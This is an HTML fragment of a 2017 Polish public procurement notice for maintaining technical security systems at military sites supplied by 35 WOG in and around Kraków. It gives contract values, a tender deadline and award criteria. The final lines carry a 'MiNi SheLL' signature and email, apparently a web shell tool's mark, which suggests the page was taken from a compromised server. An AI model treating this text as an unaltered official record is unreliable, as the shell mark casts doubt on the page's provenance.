              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zakres zmian umowy zostanie określony we wzorze umowy.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />Zamawiający ze względu na ochronę poufnego charakteru informacji, udostępnianych w toku postępowania o udzielenie zamówienia nie udostępnia SIWZ na stronie internetowej  Zamawiający przekaże wraz zaproszeniem do składania ofert SIWZ. <br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />SIWZ zostanie przekazany wykonawcom którzy zostaną zaproszeni do składania ofert. Wykonawcy zostaną zweryfikowani w zakresie posiadania uprawnień o których mowa w części I pkt 10 ppkt 10.1 INFORMACJA DOT. POSTĘPOWANIA
O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO
PROWADZONEGO W TRYBIE PRZETARGU OGRANICZONEGO
do dostępu do informacji niejawnych na 1 etapie postępowania. <br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/02/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język poslki<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>	Część nr 1: Świadczenie usług w zakresie wykonania przeglądu, konserwacji oraz serwis            w przypadku awarii systemów zabezpieczeń technicznych,  w celu utrzymania ich w stałej sprawności technicznej w niżej wymienionych obiektach wojskowych będących na zaopatrzeniu 35 WOG
1) w Krakowie przy ulicach:
	Wrocławska nr 21;
	Głowackiego nr 11;
	Zyblikiewicza nr 1; 
	Mogilska nr 85;
	Rydla nr 19; 
	Odrowąża nr 7; 
	Montelupich nr 3;
	Koletek nr 10;

2) Tarnów, ul. Dąbrowskiego 11, 
3) Nowy Sącz, ul. Czarnieckiego 13, 
 4) Jednostka Wojskowa Niedźwiedź  32- 090 Słomniki.

Wykaz urządzeń przeznaczonych do przeglądu i konserwacji w danych kompleksach wojskowych zostanie dołączony jako załącznik do SIWZ w II etapie postępowania.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50700000-2, 35121700-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  95272.36<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>TERMIN WYKONANIA I PRZEDSTAWIENIA OFERTY USUNIĘCIA AWARII </td><td>40</td></tr><tr><td>CENA  OFERTY BRUTTO ZA KONSERWACJĘ I PRZEGLĄD  </td><td>50</td></tr><tr><td>CENA  OFERTY BRUTTO USŁUG SERWISOWYCH </td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b> Całkowita wartość zamówienia wszczętego-podstawowego dla części nr 1 wraz z wartością zamówień przewidywanych na podstawie art. 67 ust 1 pkt 6 Pzp. wynosi   95272.36 zł netto. Wartość zamówienia wszczętego- podstawowego dla części nr 1 wynosi: 76 217,89 zł netto. Wartość przewidywanych zamówień z art. 67 ust 1 pkt 6 Pzp. wynosi dla części 1:  19 054,47 zł netto. <br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 2: Świadczenie usług w zakresie wykonania przeglądu, konserwacji oraz serwis            w przypadku awarii systemów zabezpieczeń technicznych,  w celu utrzymania ich w stałej sprawności technicznej w niżej wymienionych obiektach wojskowych będących na zaopatrzeniu 35 WOG
1) w Krakowie przy ulicach:
	Skrzatów nr 2;
	Ułanów  nr 43; 
	Wrocławska nr 82; 
	Rakowicka nr 29, COL-DKL;
	Rakowicka nr 29, EU OHQ;
	Rakowicka nr 29, RWT;
	Rakowicka nr 29, WKT;
	Rakowicka nr 29, ZZWT;
	Rakowicka nr 22, WBE;
	Rakowicka nr 22, bud. nr 2;
	Dietla nr 30;

2) Rząska, ul. Krakowska 2, 
3) Jednostka Wojskowa Kłaj;

Wykaz urządzeń przeznaczonych do przeglądu i konserwacji w danych kompleksach wojskowych zostanie dołączony jako załącznik do SIWZ w II etapie postępowania.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>50700000-2, 35121700-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  295219.51<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>TERMIN WYKONANIA I PRZEDSTAWIENIA OFERTY USUNIĘCIA AWARII </td><td>40</td></tr><tr><td>CENA  OFERTY BRUTTO ZA KONSERWACJĘ I PRZEGLĄD  </td><td>50</td></tr><tr><td>CENA  OFERTY BRUTTO USŁUG SERWISOWYCH </td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Całkowita wartość zamówienia wszczętego-podstawowego dla części nr 2 wraz z wartością zamówień przewidywanych na podstawie art. 67 ust 1 pkt 6 Pzp. wynosi  295219.51  zł netto. Wartość zamówienia wszczętego- podstawowego dla części nr 2 wynosi: 236 175,61 zł netto. Wartość przewidywanych zamówień z art. 67 ust 1 pkt 6 Pzp. wynosi dla części 2:  59 043,90 zł netto. <br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com